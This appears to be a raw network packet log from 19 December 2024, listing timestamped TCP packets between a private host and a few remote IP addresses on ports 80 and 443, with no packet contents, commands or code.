                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.476933002 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.477009058 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.477619886 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.477669001 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.477684975 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.477709055 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.477709055 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.477763891 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.478416920 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.478432894 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.478444099 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.478456020 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.478470087 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.478513002 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.478564978 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.479075909 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.479089022 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.479135036 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.479782104 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.479923964 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.480429888 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.481487989 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.481560946 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.481991053 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.482106924 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.483319044 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.483355999 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.483403921 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.484230042 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.485166073 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.485178947 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.485209942 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.485244989 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.486793995 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.486813068 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.486957073 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.488130093 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.488537073 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.488589048 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.488890886 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.490025043 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.490053892 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.490216970 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.491575956 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.491592884 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.491727114 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.493432999 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.493448019 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.494573116 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.494962931 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.495259047 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.495290995 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.495331049 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.496637106 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.496651888 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.496711969 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.498256922 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.498271942 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.498420000 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.500169039 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.500181913 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.500252008 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.500252008 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.501420021 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.501466036 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.501818895 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.502829075 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.502902985 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.503170967 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.503252029 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.505067110 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.505079985 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.505150080 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.506465912 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.506484032 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.506509066 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.506532907 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.507761955 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.507777929 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.507841110 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.507841110 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.509337902 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.509351015 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.509418011 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.509418011 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.510744095 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.510759115 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.510795116 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.510806084 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.512228966 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.512248039 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.512290001 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.513258934 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.513276100 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.513313055 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.513381004 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.515161991 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.515177011 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.515238047 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.515238047 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.516237974 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.516422033 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.516463995 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.516463995 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.517573118 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.517657042 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.517764091 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.517869949 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.518950939 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.518964052 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.519041061 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.522788048 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.522802114 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.522901058 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.524271011 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.524287939 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.524709940 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.525187969 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.526036978 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.526097059 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.527467966 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.527482986 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.527615070 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.530610085 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.530626059 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.530683041 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.534024954 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.534806013 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.535398960 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.537986994 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.538713932 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.538794041 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.539556026 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.539568901 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.539581060 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.539596081 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.539663076 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.539663076 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.540422916 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.540452957 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.540477991 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.540519953 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.540519953 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.541461945 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.541481972 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.541495085 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.541536093 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.541536093 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.542004108 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.542063951 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.542078972 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.542089939 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.542143106 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.542143106 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.542866945 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.542882919 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.542916059 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.542958975 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.543240070 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.543251991 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.543276072 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.543612957 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.544022083 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.547482967 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.646392107 CET44349773104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.646469116 CET44349773104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.646544933 CET49773443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.650970936 CET49773443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.650989056 CET44349773104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.654062986 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.654434919 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.654617071 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.654619932 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.654673100 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.654756069 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.655332088 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.655675888 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.655814886 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.655905962 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.655956030 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.656856060 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.657179117 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.657320023 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.659384966 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.659399033 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.659724951 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.661478996 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.661492109 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.661564112 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.664438963 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.664510012 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.665143967 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.665538073 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.667516947 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.668318033 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.669629097 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.670530081 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.670566082 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.670599937 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.670634985 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.670635939 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.670674086 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.671267986 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.671302080 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.671356916 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.671360970 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.672046900 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.672080994 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.672081947 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.672116995 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.672168016 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.672261000 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.672755003 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.672791004 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.672823906 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.672835112 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.672835112 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.672859907 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.672909021 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.673491001 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.673526049 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.673557997 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.673608065 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.673608065 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.674279928 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.674334049 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.674366951 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.674643993 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.675401926 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.675437927 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.675862074 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.675896883 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.675925016 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.675930023 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.676024914 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.676673889 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.676726103 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.676856995 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.676971912 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.678143978 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.678180933 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.678214073 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.678874969 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.678910017 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.678982973 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.679357052 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.680227995 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.680263042 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.680306911 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.680306911 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.680718899 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.680799007 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.681319952 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.681431055 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.681905985 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.681938887 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.681983948 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.681983948 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.682768106 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.682801008 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.682842970 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.682842970 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.684005022 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.684039116 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.684094906 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.684487104 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.684559107 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.685198069 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.685259104 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.685892105 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.685925961 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.685967922 CET4977280192.168.2.431.41.244.11
